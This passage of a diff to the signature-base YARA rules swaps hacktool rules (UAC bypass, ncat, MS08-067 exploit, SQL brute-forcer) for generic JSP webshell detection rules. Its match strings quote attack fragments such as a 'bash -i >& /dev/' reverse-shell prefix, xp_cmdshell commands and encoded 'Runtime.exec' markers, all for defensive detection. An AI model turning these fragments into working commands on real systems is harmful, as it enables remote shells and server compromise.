+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$jw_sus1 = /getParameter\("."\)/ ascii wide
+		$jw_sus4 = "yoco" fullword ascii wide
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
 
 	condition:
-		all of them
+		( any of ( $input* ) and any of ( $req* ) ) and ( filesize < 200 or ( filesize < 1000 and any of ( $jw_sus* ) ) ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( 2 of ( $payload* ) or all of ( $logger* ) )
 }
-rule SIGNATURE_BASE_Bypassuac_3
+rule SIGNATURE_BASE_EXT_WEBSHELL_JSP_Generic_Tiny : FILE
 {
 	meta:
-		description = "Auto-generated rule - file BypassUacDll.dll"
-		author = "yarGen Yara Rule Generator"
-		id = "407a8e12-1160-584d-94c8-7aa78e29c754"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L969-L982"
+		description = "Generic JSP webshell tiny"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fad14524-de44-52ea-95e6-3e5de3138926"
+		date = "2021-01-07"
+		modified = "2024-12-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5691-L5776"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1974aacd0ed987119999735cad8413031115ce35"
-		logic_hash = "cf3183ff4562f2962f87bc594c1710c73c113fa1d49fa56f7a3ff391ba4b9003"
+		hash = "8fd343db0442136e693e745d7af1018a99b042af"
+		hash = "87c3ac9b75a72187e8bc6c61f50659435dbdc4fde6ed720cebb93881ba5989d8"
+		hash = "1aa6af726137bf261849c05d18d0a630d95530588832aadd5101af28acc034b5"
+		logic_hash = "a6bf86961bc07b312fc24362d70d22ce826a2e918e1e0e8679bd415783d8500a"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 48
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "BypassUacDLL.dll" fullword wide
-		$s1 = "\\Release\\BypassUacDll" ascii
-		$s3 = "Win7ElevateDLL" fullword wide
-		$s7 = "BypassUacDLL" fullword wide
+		$payload1 = "ProcessBuilder" fullword wide ascii
+		$payload2 = "URLClassLoader" fullword wide ascii
+		$payload_rt1 = "Runtime" fullword wide ascii
+		$payload_rt2 = "getRuntime" fullword wide ascii
+		$payload_rt3 = "exec" fullword wide ascii
+		$jg_sus1 = "xe /c" ascii wide
+		$jg_sus2 = /getParameter\("."\)/ ascii wide
+		$jg_sus3 = "</pre>" ascii wide
+		$jg_sus4 = "BASE64Decoder" fullword ascii wide
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$fixed_cmd1 = "bash -i >& /dev/" ascii wide
+		$fp1 = "Find Security Bugs is a plugin that aims to help security audit.</Details>"
 
 	condition:
-		3 of them
+		(( filesize < 1000 and any of ( $jg_sus* ) ) or filesize < 250 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( ( any of ( $input* ) and any of ( $req* ) ) or ( any of ( $fixed_cmd* ) ) ) and ( 1 of ( $payload* ) or all of ( $payload_rt* ) ) and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_Bypassuacdll_6
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic : FILE
 {
 	meta:
-		description = "Auto-generated rule - file BypassUacDll.aps"
-		author = "yarGen Yara Rule Generator"
-		id = "5be27053-446f-5ea3-a242-2661aeffa3df"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1000-L1011"
+		description = "Generic JSP webshell"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "7535ade8-fc65-5558-a72c-cc14c3306390"
+		date = "2021-01-07"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5778-L5870"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
-		logic_hash = "3cb89875ddf79a3709aeb58149e228e03b9fb43fa1565aab5ece743857b4cc71"
+		hash = "4762f36ca01fb9cda2ab559623d2206f401fc0b1"
+		hash = "bdaf9279b3d9e07e955d0ce706d9c42e4bdf9aa1"
+		hash = "ee9408eb923f2d16f606a5aaac7e16b009797a07"
+		logic_hash = "8b525fea9a424c3e555e9aa38a587d5936a49022db73094a17cb92fd723074f3"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = -24
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s3 = "BypassUacDLL.dll" fullword wide
-		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+		$susp0 = "cmd" fullword nocase ascii wide
+		$susp1 = "command" fullword nocase ascii wide
+		$susp2 = "shell" fullword nocase ascii wide
+		$susp3 = "download" fullword nocase ascii wide
+		$susp4 = "upload" fullword nocase ascii wide
+		$susp5 = "Execute" fullword nocase ascii wide
+		$susp6 = "\"pwd\"" ascii wide
+		$susp7 = "\"</pre>" ascii wide
+		$susp8 = /\\u00\d\d\\u00\d\d\\u00\d\d\\u00\d\d/ ascii wide
+		$susp9 = "*/\\u00" ascii wide
+		$fp1 = "command = \"cmd.exe /c set\";"
+		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$payload1 = "ProcessBuilder" fullword ascii wide
+		$payload2 = "processCmd" fullword ascii wide
+		$rt_payload1 = "Runtime" fullword ascii wide
+		$rt_payload2 = "getRuntime" fullword ascii wide
+		$rt_payload3 = "exec" fullword ascii wide
 
 	condition:
-		all of them
+		filesize < 300KB and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) and not any of ( $fp* ) and any of ( $susp* )
 }
-rule SIGNATURE_BASE_Bypassuac_EXE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Base64 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file BypassUacDll.aps"
-		author = "yarGen Yara Rule Generator"
-		id = "b88aded5-7dfb-5cdf-bb42-cd8b069259e0"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1013-L1027"
+		description = "Generic JSP webshell with base64 encoded payload"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2eabbad2-7d10-573a-9120-b9b763fa2352"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5872-L5947"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
-		logic_hash = "0283efd6866ed9417f2d255715f04c0ed6d7a89befce6a3a52c22ac06593c0bd"
+		hash = "8b5fe53f8833df3657ae2eeafb4fd101c05f0db0"
+		hash = "1b916afdd415dfa4e77cecf47321fd676ba2184d"
+		logic_hash = "fc05f90bec7ec97e6369481a0d25bc12772cba15d3ec9bac2944571b4b5c927f"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 48
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "Wole32.dll" wide
-		$s3 = "System32\\migwiz" wide
-		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
-		$s5 = "Elevation:Administrator!new:" wide
-		$s6 = "BypassUac" wide
+		$one1 = "SdW50aW1l" wide ascii
+		$one2 = "J1bnRpbW" wide ascii
+		$one3 = "UnVudGltZ" wide ascii
+		$one4 = "IAdQBuAHQAaQBtAGUA" wide ascii
+		$one5 = "SAHUAbgB0AGkAbQBlA" wide ascii
+		$one6 = "UgB1AG4AdABpAG0AZQ" wide ascii
+		$two1 = "leGVj" wide ascii
+		$two2 = "V4ZW" wide ascii
+		$two3 = "ZXhlY" wide ascii
+		$two4 = "UAeABlAGMA" wide ascii
+		$two5 = "lAHgAZQBjA" wide ascii
+		$two6 = "ZQB4AGUAYw" wide ascii
+		$three1 = "TY3JpcHRFbmdpbmVGYWN0b3J5" wide ascii
+		$three2 = "NjcmlwdEVuZ2luZUZhY3Rvcn" wide ascii
+		$three3 = "U2NyaXB0RW5naW5lRmFjdG9ye" wide ascii
+		$three4 = "MAYwByAGkAcAB0AEUAbgBnAGkAbgBlAEYAYQBjAHQAbwByAHkA" wide ascii
+		$three5 = "TAGMAcgBpAHAAdABFAG4AZwBpAG4AZQBGAGEAYwB0AG8AcgB5A" wide ascii
+		$three6 = "UwBjAHIAaQBwAHQARQBuAGcAaQBuAGUARgBhAGMAdABvAHIAeQ" wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
 
 	condition:
-		all of them
+		($cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and filesize < 300KB and ( any of ( $one* ) and any of ( $two* ) or any of ( $three* ) )
 }
-rule SIGNATURE_BASE_APT_Proxy_Malware_Packed_Dev
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Processbuilder : FILE
 {
 	meta:
-		description = "APT Malware - Proxy"
-		author = "FRoth"
-		id = "0b81b6c9-86fa-59c1-b58c-80310f6c0680"
-		date = "2014-11-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1029-L1044"
+		description = "Generic JSP webshell which uses processbuilder to execute user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2a7c5f44-24a1-5f43-996e-945c209b79b1"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5949-L5986"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6b6a86ceeab64a6cb273debfa82aec58"
-		logic_hash = "64b15aaf93b40744b887c75fa26f4996d72045a55ac82ab4de89a0d9a3714684"
-		score = 50
+		hash = "82198670ac2072cd5c2853d59dcd0f8dfcc28923"
+		hash = "c05a520d96e4ebf9eb5c73fc0fa446ceb5caf343"
+		hash = "347a55c174ee39ec912d9107e971d740f3208d53af43ea480f502d177106bbe8"
+		hash = "d0ba29b646274e8cda5be1b940a38d248880d9e2bba11d994d4392c80d6b65bd"
+		logic_hash = "fffc173cc23e158e319e48097243a64da232151e441c39e4b6ecc2565a82d862"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$string0 = "PECompact2" fullword
-		$string1 = "[LordPE]"
-		$string2 = "steam_ker.dll"
+		$exec = "ProcessBuilder" fullword wide ascii
+		$start = "start" fullword wide ascii
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		all of them
+		filesize < 2000 and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $start
 }
-rule SIGNATURE_BASE_Tzddos_Ddos_Tool_CN
+
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Reflection : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file tzddos"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bf2bfc7b-4db8-5d35-a312-2530a42985d5"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1046-L1065"
+		description = "Generic JSP webshell which uses reflection to execute user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "806ffc8b-1dc8-5e28-ae94-12ad3fee18cd"
+		date = "2021-01-07"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5988-L6070"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
-		logic_hash = "fed09a8586f9b573e46871efa71082f4573d2bd069fde9cc2928b267d0025bab"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
+		hash = "bf0ff88cbb72c719a291c722ae3115b91748d5c4920afe7a00a0d921d562e188"
+		logic_hash = "386aeb3745c5dd815f00bbc941450a2c3f1ddfc2956c67ecd5bee9318b1756ef"
+		score = 75
+		quality = 0
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "for /f %%a in (host.txt) do (" ascii
-		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
-		$s2 = "del host.txt /q" fullword ascii
-		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s4 = "start Http.exe %%a %http%" fullword ascii
-		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
-		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
+		$ws_exec = "invoke" fullword wide ascii
+		$ws_class = "Class" fullword wide ascii
+		$fp1 = "SOAPConnection"
+		$fp2 = "/CORBA/"
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$cj_encoded1 = "\"java.util.Base64$Decoder\"" ascii wide
 
 	condition:
-		all of them
+		all of ( $ws_* ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not any of ( $fp* ) and ( filesize < 10KB and ( any of ( $input* ) and any of ( $req* ) ) or ( filesize < 30KB and any of ( $cj_encoded* ) and math.entropy ( 500 , filesize -500 ) >= 5.5 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) )
 }
-rule SIGNATURE_BASE_Ncat_Hacktools_CN
+
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Classloader : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file nc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bdbfaf75-f8c0-508e-b6b1-9ddea179a325"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1067-L1085"
+		description = "Generic JSP webshell which uses classloader to execute user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "037e6b24-9faf-569b-bb52-dbe671ab2e87"
+		date = "2021-01-07"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6072-L6149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "001c0c01c96fa56216159f83f6f298755366e528"
-		logic_hash = "0e059e90447747ed5259da4a870036d37d181c1cfea734ab25e760e81612f0f3"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347"
+		hash = "f3a7e28e1c38fa5d37811bdda1d6b0893ab876023d3bd696747a35c04141dcf0"
+		hash = "8ea2a25344e6094fa82dfc097bbec5f1675f6058f2b7560deb4390bcbce5a0e7"
+		hash = "b9ea1e9f91c70160ee29151aa35f23c236d220c72709b2b75123e6fa1da5c86c"
+		hash = "80211c97f5b5cd6c3ab23ae51003fd73409d273727ba502d052f6c2bd07046d6"
+		hash = "8e544a5f0c242d1f7be503e045738369405d39731fcd553a38b568e0889af1f2"
+		logic_hash = "109c0063f4e8db6172fd872b3b93d4f069234f28bbf033fbd2c5f135051df77e"
+		score = 75
+		quality = 0
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
-		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
-		$s3 = "gethostpoop fuxored" fullword ascii
-		$s6 = "VERNOTSUPPORTED" fullword ascii
-		$s7 = "%s [%s] %d (%s)" fullword ascii
-		$s12 = " `--%s' doesn't allow an argument" fullword ascii
+		$exec = "extends ClassLoader" wide ascii
+		$class = "defineClass" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		all of them
+		(( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $class ) and ( filesize < 10KB or ( filesize < 50KB and ( math.entropy ( 500 , filesize -500 ) <= 1 or math.entropy ( 500 , filesize -500 ) >= 7.7 ) ) )
 }
-rule SIGNATURE_BASE_MS08_067_Exploit_Hacktools_CN
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Encoded_Shell : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file cs.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c15836c7-e739-5cc0-9d41-d651ea3e4738"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1087-L1106"
+		description = "Generic JSP webshell which contains cmd or /bin/bash encoded in ascii ord"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "359949d7-1793-5e13-9fdc-fe995ae12117"
+		date = "2021-01-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6151-L6177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
-		logic_hash = "e5756250de401324d0c86f855bc088c8364e4a632cece25e553939fa621b73d8"
-		score = 60
-		quality = 60
-		tags = ""
+		hash = "3eecc354390d60878afaa67a20b0802ce5805f3a9bb34e74dd8c363e3ca0ea5c"
+		hash = "f6c2112e3a25ec610b517ff481675b2ce893cb9f"
+		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
+		logic_hash = "74f45478e5bd7bb300e4ec493c2d3ef9a26340a141c3512a722618b3a3731500"
+		score = 75
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
-		$s3 = "Make SMB Connection error:%d" fullword ascii
-		$s5 = "Send Payload Over!" fullword ascii
-		$s7 = "Maybe Patched!" fullword ascii
-		$s8 = "RpcExceptionCode() = %u" fullword ascii
-		$s11 = "ph4nt0m" fullword wide
-		$s12 = "\\\\%s\\IPC" ascii
+		$sj0 = /\{ ?47, 98, 105, 110, 47, 98, 97, 115, 104/ wide ascii
+		$sj1 = /\{ ?99, 109, 100}/ wide ascii
+		$sj2 = /\{ ?99, 109, 100, 46, 101, 120, 101/ wide ascii
+		$sj3 = /\{ ?47, 98, 105, 110, 47, 98, 97/ wide ascii
+		$sj4 = /\{ ?106, 97, 118, 97, 46, 108, 97, 110/ wide ascii
+		$sj5 = /\{ ?101, 120, 101, 99 }/ wide ascii
+		$sj6 = /\{ ?103, 101, 116, 82, 117, 110/ wide ascii
 
 	condition:
-		4 of them
+		filesize < 300KB and any of ( $sj* )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Sql
+rule SIGNATURE_BASE_WEBSHELL_JSP_Netspy : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file sql.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "77ea95fc-7a6a-522b-8a72-1832598c4d2d"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1108-L1129"
+		description = "JSP netspy webshell"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "41f5c171-878d-579f-811d-91d74f7e3e24"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6179-L6245"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
-		logic_hash = "139f7308055351d9dc8a704c055360ac9408dcefc9eee4b9f222886fb5249b8c"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "94d1aaabde8ff9b4b8f394dc68caebf981c86587"
+		hash = "3870b31f26975a7cb424eab6521fc9bffc2af580"
+		logic_hash = "65432e42ad2626b62b1d1a6298c301513c2fb03d89193a77b053069cebcb45e9"
+		score = 75
+		quality = 1
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
-		$s2 = "s.exe start error...%d" fullword ascii
-		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
-		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
-		$s10 = "Result.txt" fullword ascii
-		$s11 = "Usage:sql.exe [options]" fullword ascii
-		$s17 = "%s root %s %d error" fullword ascii
-		$s18 = "Pass.txt" fullword ascii
-		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
+		$scan1 = "scan" nocase wide ascii
+		$scan2 = "port" nocase wide ascii
+		$scan3 = "web" fullword nocase wide ascii
+		$scan4 = "proxy" fullword nocase wide ascii
+		$scan5 = "http" fullword nocase wide ascii
+		$scan6 = "https" fullword nocase wide ascii
+		$write1 = "os.write" fullword wide ascii
+		$write2 = "FileOutputStream" fullword wide ascii
+		$write3 = "PrintWriter" fullword wide ascii
+		$http = "java.net.HttpURLConnection" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
